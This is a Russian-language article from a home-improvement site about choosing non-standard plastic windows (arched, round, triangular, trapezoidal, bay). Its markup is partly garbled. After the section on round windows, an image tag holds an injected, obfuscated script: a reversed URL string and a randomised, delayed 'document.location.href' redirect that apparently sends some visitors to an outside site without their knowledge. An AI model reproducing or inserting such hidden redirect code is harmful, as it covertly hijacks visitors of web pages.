Добавить в закладки

Окна нестандартных размеров: особенности выбора

Современный дизайн предполагает индивидуальность, которая прослеживается даже в деталях частных домов. Заказчики хотят сделать свой проект уникальным, непохожим на окружающие дома. В этих случаях на помощь приходят окна нестандартных размеров, которые сразу выделяют коттедж на фоне соседей.

Пластиковые окна нестандартной формы могут быть выполнены по размерам, предоставленным заказчиком, с текстурой под древесину и любого желаемого оттенка. Форма может быть треугольной или круглой, арочной или эркерной — все зависит лишь от фантазии клиента.

Конечно, нестандартные окна чаще всего устанавливаются в частных домах, а не квартирах, так как последние не предполагают радикального изменения стены. Однако в многоквартирных домах тоже можно встретить необычные окна — это может быть следствием желания подрядчика или архитектора.

Процесс изготовления нестандартных пластиковых окон практически не отличается от обычного. Высококачественный профиль ПВХ, который используется в пластиковых окнах, сгибается с помощью современных технологий, и принимает необходимую форму. Многие производители, например http://okna-chastniy-dom.ru/nestandartnye-okna/, предлагают нестандартные окна, цена на которые может различаться.

and_1.jpg» alt=»Окна нестандартных размеров: арочные окна» width=»600″ height=»400″ />

Типы нестандартных окон

Существует много вариантов нестандартных окон, однако чаще всего можно встретить следующие варианты:

Арочные

Нестандартная конструкция арочных окон в верхней части имеет округлую форму, представляющую собой дугу. Такие окна так же, как и все остальные, могут быть ламинированы под желаемый цвет или оттенок древесины. Чаще всего, расчет стоимости нестандартного окна арочной формы делает непосредственно производитель.

Стоимость арочных окон будет выше, чем обычных, однако они очень красиво могут смотреться в загородных домах. Считается, что благодаря осложненному процессу производства срок службы таких окон значительно увеличивается. Для данного типа существуют свои ограничения, с которыми необходимо ознакомиться перед заказом.

Обычно заказчики предпочитают выполнять металлопластиковые арочные окна в форме правильной арки, однако возможно создание подковообразной арки, полуциркульных или стрельчатых окон.

Круглые

Круглые окна могут придать уникальный вид любому загородному дому. Конструкция такого окна сложна в производстве, так как делится импостом, на который устанавливаются петли, если необходим открывающий элемент. Круглые окна отлично смотрятся в спальной или ванной комнатах, библиотеке или на чердаке. Размер зависит от пожеланий клиента и возможностей помещения.

tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to/be/be15a519550d8f5e69a15b6b907fa30d.jpg» alt=»Окна нестандартных размеров: круглые окна» width=»600″ height=»400″ />

Треугольные

Данная конструкция в последнее время набирает неожиданную популярность, связанную с тенденцией строить коттеджи и загородные дома с островерхими крышами. Такие профили могут быть установлены на мансардных этажах, а также могут быть глухими, открытыми или откидными. Текстура рамы выбирается заказчиком и может быть ламинирована под желаемый цвет.

Трапециевидные

Трапеция — необычная форма, однако пластиковые окна такого типа могут отлично вписаться в любые помещения. Дизайнеры особенно любят трапециевидные окна в комнатах, оформленных под стиль ретро. Такая конструкция позволяет пропустить в комнаты больше света и подчеркнуть изысканный вкус хозяина дома. Стоит обратить внимание, что при изготовлении трапециевидных окон углы должны быть определенного градуса.

Эркерные

Пластиковые окна эркерной формы — это стильно и оригинально. Вогнутые конструкции состоят из нескольких рам и могут быть оборудованы открывающимся элементом. Такое окно значительно увеличивает визуальный размер проема и пускает много естественного света в помещение.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 27.08.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: